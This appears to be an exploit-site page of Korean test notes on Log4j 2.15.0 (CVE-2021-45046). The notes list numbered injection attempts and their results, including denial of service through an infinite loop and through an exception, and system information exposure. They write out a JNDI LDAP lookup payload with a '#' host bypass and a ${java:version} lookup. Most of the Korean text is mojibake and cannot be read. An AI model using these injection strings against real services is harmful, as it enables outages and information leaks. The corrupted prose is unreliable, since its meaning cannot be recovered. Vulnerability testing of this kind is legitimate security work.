Share
## https://sploitus.com/exploit?id=0D243A34-B42E-5007-90D0-A30ECABDA204
log4j RCE (CVE-2021-44228)์ด 2.15์์ ํจ์น๋์์ง๋ง, CVE-2021-45046 (DoS ์ ๋ฐ) ์ทจ์ฝ์ ์ด ์๋ก ๋ฐ๊ฒฌ๋์์.
์๋๋ ํ
์คํธ ํด๋ณธ ๊ฒฐ๊ณผ.
[ํ
์คํธ ํ๊ฒฝ]
log4j-2.15.0 (api , core)
JRE-1.8.0
jdk1.8.0_151
Eclipse IDE (Maven Project)
1. Log4j RCE (CVE-2021-44228) ๊ตฌ๋ฌธ ํ
์คํธ -> Not Vuln
2. ์์์ ctx ๊ฐ์ฒด๋ช
์ ์ฝ์
-> Not vuln
3. context๋ฅผ ๋ฐ๋ ๊ฐ์ฒด์ ๋์ผํ ์ด๋ฆ์ผ๋ก ์ฝ์
ํ๋ ๊ฒฝ์ฐ -> infinite loop ๋ก DoS ๋ฐ์
4. ${jndi:ldap://127.0.0.1#[ldap ์๋ฒ ์ฃผ์]} ํํ๋ก ์ฝ์
-> UnknownHostException ๋ฐ์, DoS ๋ฏธ๋ฐ์
5. jndi:ldap://[ldap์๋ฒ]#[ldap์๋ฒ] ํํ -> Not vuln
6. Java ์ฝ๋ ์ฝ์
-> illegalArgmumentException ์ผ๋ก DoS ๋ฐ์
7-1. Java ๊ตฌ๋ฌธ ์ฝ์
-> System info exposure
7-2. Java ๊ตฌ๋ฌธ ์ฝ์
->illegalArgmumentException , DoS ๋ฐ์
-> illegalArgumentException ๋ฐ์ ์ง์ ํ์ธ ์ Switch case ๋ฌธ์ผ๋ก 2-5์์ System info exposure ๊ฐ๋ฅํ Java ๊ตฌ๋ฌธ (${java:version} ์
์๋๋ ๋ฃจํด์ผ๋ก ๋ณด์.
